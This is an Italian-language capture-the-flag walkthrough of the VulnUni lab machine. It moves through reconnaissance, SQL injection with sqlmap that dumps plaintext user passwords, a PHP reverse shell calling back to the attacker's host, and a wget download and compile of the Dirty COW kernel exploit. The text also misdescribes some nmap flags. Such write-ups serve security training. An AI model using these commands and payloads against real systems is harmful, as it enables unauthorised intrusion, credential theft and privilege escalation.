HackingLab – vulnUNI

Iniziamo con la scansione della rete con netdiscover per identificare la macchina target sulla rete; la macchina target risponde all’IP 192.168.188.85.

Currently scanning: 172.16.80.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                           
 142 Captured ARP Req/Rep packets, from 11 hosts.   Total size: 8520                                                       
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.188.81  08:00:27:8d:88:12    101    6060  PCS Systemtechnik GmbH                                                  
 192.168.188.1   98:9b:cb:9f:3a:e3     20    1200  AVM Audiovisuelles Marketing und Computersysteme GmbH                   
 192.168.188.20  cc:b0:da:aa:38:07     11     660  Liteon Technology Corporation                                           
 192.168.188.43  54:b8:0a:01:ad:33      1      60  D-Link International                                                    
 192.168.188.65  08:00:27:4e:2c:1c      1      60  PCS Systemtechnik GmbH                                                  
 192.168.188.25  34:41:5d:e7:72:d7      1      60  Intel Corporate                                                         
 192.168.188.23  48:d6:d5:03:07:22      1      60  Google, Inc.                                                            
 192.168.188.85  08:00:27:78:1f:24      1      60  PCS Systemtechnik GmbH                                                  
 192.168.188.29  00:03:7f:c3:11:0c      1      60  Atheros Communications, Inc.                                            
 192.168.188.26  40:b0:34:db:2a:65      2     120  Hewlett Packard                                                         
 192.168.188.21  a8:db:03:6e:3f:f9      2     120  SAMSUNG ELECTRO-MECHANICS(THAILAND)

Con nmap effettuiamo una scansione delle porte e dei servizi aperti; la sintassi è sudo nmap -sV -sT -O -A -p- <INDIRIZZO IP> dove:
-sV indicano un SCTP INIT scan,
-sT indicano un TCP connect scan,
-O indica il riconoscimento del Sistema Operativo,
-A indica una scansione “invasiva”,
-p- indica la scansione di tutte le porte.

La scansione con nmap rivela aperte le seguenti porte:
80 – http.

kali@kali:~/Documenti/VulnUNI$ sudo nmap -sV -sT -O -A -p- 192.168.188.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-08 17:07 CEST
Nmap scan report for vulnuni.local (192.168.188.85)
Host is up (0.00065s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni - We train the top Information Security Professionals
MAC Address: 08:00:27:78:1F:24 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms vulnuni.local (192.168.188.85)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.75 seconds

Procediamo con l’enumerazione del sito web che risponde alla porta 80 usando gobuster seguendo la sintassi gobuster dir -u <INDIRIZZO IP> -w <PATH DIZIONARIO>.

kali@kali:~/Documenti/VulnUNI$ gobuster dir -u 192.168.188.85 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.188.85
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/08 17:47:48 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/about (Status: 200)
/blog (Status: 200)
/cgi-bin/ (Status: 403)
/contact (Status: 200)
/courses (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/teacher (Status: 200)
===============================================================
2020/06/08 17:48:01 Finished
===============================================================

Accediamo al path /courses e visualizziamo il codice sorgente alla ricerca di informazioni interessanti: troviamo un riferimento ad una pagina non linkata: vulnuni-eclass-platform.htm

<!-- Disabled till new version is installed -->
<!-- <li class="nav-item"><a href="vulnuni-eclass-platform.html" class="nav-link">EClass Platform</a></li> -->

Accediamo e visualizziamo la pagina di login.

Attiviamo Burp Suite per intercettare la richiesta inserendo Username e Password a caso e la salviamo per poterla utilizzare successivamente con sqlmap.
Abilitiamo quindi il proxy sul browser web indirizzandolo a 127.0.0.1 porta 8080, lanciamo Burp Suite, accediamo alla sezione Proxy –> Intercept ed abilitiamo la voce Intrcept is on.
Effettuiamo il submit della form e clickiamo il tasto Forward per intercettare la richiesta, che salviamo in un file txt. Spegniamo quindi il proxy così da non impedire la navigazione.

Di seguito la richiesta di login così come intercettata da Burp Suite.

POST /vulnuni-eclass/ HTTP/1.1
Host: vulnuni.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.85/vulnuni-eclass/
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Connection: close
Cookie: PHPSESSID=b53htpaatrv771a0j3n6gd5n11
Upgrade-Insecure-Requests: 1
uname=admin&pass=admin&submit=Enter

Utilizziamo sqlmap per verificare la vulnerabilità della base dati indicando come parametri –dbs per elencare i data base e –batch per evitare le iterazioni; troviamo i seguenti db:
eclass,
information_schema,
INFOSEC100,
mysql,
performance_schema.

kali@kali:~/Documenti/VulnUNI$ sqlmap -r request --dbs --batch
        ___
       __H__                                                                                                                
 ___ ___[(]_____ ___ ___  {1.4.6#stable}                                                                                    
|_ -| . [.]     | .'| . |                                                                                                   
|___|_  [.]_|_|_|__,|  _|                                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:20:15 /2020-06-08/

[18:20:15] [INFO] parsing HTTP request from 'request'
[18:20:15] [INFO] resuming back-end DBMS 'mysql' 
[18:20:15] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfh729pdtp8...hejngo3do5'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 8714 FROM (SELECT(SLEEP(5)))zxwY) AND 'rvZs'='rvZs&pass=admin&submit=Enter
---
[18:20:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[18:20:16] [INFO] fetching database names
[18:20:16] [INFO] fetching number of databases
[18:20:16] [INFO] resumed: 5
[18:20:16] [INFO] resumed: information_schema
[18:20:16] [INFO] resumed: INFOSEC100
[18:20:16] [INFO] resumed: eclass
[18:20:16] [INFO] resumed: mysql
[18:20:16] [INFO] resumed: performance_schema
available databases [5]:
[*] eclass
[*] information_schema
[*] INFOSEC100
[*] mysql
[*] performance_schema

Utilizziamo sqlmap per estrarre utenti e password utilizzando la sintassi sqlmap -r <REQUEST> -D <DB NAME> -T <TABLE> -C <COLUMNS> –dump –batch.

kali@kali:~/Documenti/VulnUNI$ sqlmap -r request -D eclass -T user -C username,password --dump --batch
        ___
       __H__                                                                                                                
 ___ ___[.]_____ ___ ___  {1.4.6#stable}                                                                                    
|_ -| . [(]     | .'| . |                                                                                                   
|___|_  [)]_|_|_|__,|  _|                                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:50:14 /2020-06-08/

Database: eclass
Table: user
[4 entries]
+----------+--------------+
| username | password     |
+----------+--------------+
| admin    | ilikecats89  |
| garris.e | hf74nd9dmw   |
| perez.s  | i74nw02nm3   |
| smith.j  | smith.j.1971 |
+----------+--------------+

Effettuiamo login con username admin e password ilikecats89.
Sotto la voce Administration Tools troviamo la voce Restore a course che permette l’upload di un file in formato criptato.

Predisponiamo per l’upload lo script php-reverse-shell.ph copiandolo da /usr/share/webshells/php e modificandolo con i dati relativi alla nostra macchina kali.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.188.87';  // CHANGE THIS
$port = 4455;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

Predisponiamo una shell in ascolto sulla porta 4455 con il comando nc usando la sintassi nc -lvp 4455 e lanciamo il payload dal path vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/<NOME DEL PAYLOAD>. Otteniamo una shell con il comando python -c ‘import pty; pty.spawn(“/bin/bash”)’

kali@kali:~/Documenti/VulnUni$ nc -lvp 4455
listening on [any] 4455 ...
connect to [192.168.188.87] from vulnuni.local [192.168.188.73] 37962
Linux vulnuni 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
 11:44:18 up 27 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'                                                
www-data@vulnuni:/$ whoami
whoami
www-data
www-data@vulnuni:/$ id 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@vulnuni:/$ 

Nella directory /home/vulnuni troviamo la prima flag
68fc668278d9b0d6c3b9dc100bee181e

www-data@vulnuni:/home/vulnuni$ cat flag.txt
cat flag.txt
68fc668278d9b0d6c3b9dc100bee181e

Verifichiamo la versione del kernel allo scopo di visualizzare una eventuale vulnerabilità e scopriamo che il kernel 3.11.0-15 è soggetto alla vulnerability dirty-cow. Scarichiamo il payload da Exploit Database e predisponiamo un server http con python.

kali@kali:~/Documenti/VulnUni$ ls -al
totale 28
drwxr-xr-x 2 kali kali 4096 giu 11 08:59 .
drwxr-xr-x 5 kali kali 4096 giu 11 08:21 ..
-rw-r--r-- 1 kali kali 5006 giu 11 08:58 40839.c
-rwxr-xr-x 1 kali kali 5496 giu 11 08:30 shell.php
-rw-r--r-- 1 kali kali 2429 giu 11 08:41 shell.zip
kali@kali:~/Documenti/VulnUni$ python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...

Sulla macchina target ci posizioniamo sulla directory /tmp per essere sicuri di avere privilegi di scrittura e scarichiamo il payload; lo compiliamo con la sintassi indicata nel codice sorgente gcc -pthread dirty.c -o dirty -lcrypt e lo eseguiamo.

www-data@vulnuni:/$ cd /tmp
cd /tmp
www-data@vulnuni:/tmp$ wget http://192.168.188.87:8000/40839.c
wget http://192.168.188.87:8000/40839.c
--2020-06-11 12:02:18--  http://192.168.188.87:8000/40839.c
Connecting to 192.168.188.87:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/plain]
Saving to: `40839.c'

100%[======================================>] 5,006       --.-K/s   in 0s      

2020-06-11 12:02:18 (849 MB/s) - `40839.c' saved [5006/5006]

www-data@vulnuni:/tmp$ ls -al
ls -al
total 36
drwxrwxrwt  6 root     root     4096 Jun 11 12:02 .
drwxr-xr-x 24 root     root     4096 Mar 18 00:40 ..
drwxrwxrwt  2 root     root     4096 Jun 11 11:16 .ICE-unix
-r--r--r--  1 root     root       11 Jun 11 11:16 .X0-lock
drwxrwxrwt  2 root     root     4096 Jun 11 11:16 .X11-unix
-rw-rw-rw-  1 www-data www-data 5006 Jun 11 09:58 40839.c
drwxrwxrwt  2 lightdm  lightdm  4096 Jun 11 11:16 at-spi2
drwx------  2 lightdm  lightdm  4096 Jun 11 11:16 pulse-fw4HcDFew9fu
-rw-rw-r--  1 lightdm  lightdm     0 Jun 11 11:16 unity_support_test.1
www-data@vulnuni:/tmp$ gcc -pthread 40839.c -o dirtycow -lcrypt             
gcc -pthread 40839.c -o dirtycow -lcrypt

Leave a Reply

Your email address will not be published. Required fields are marked *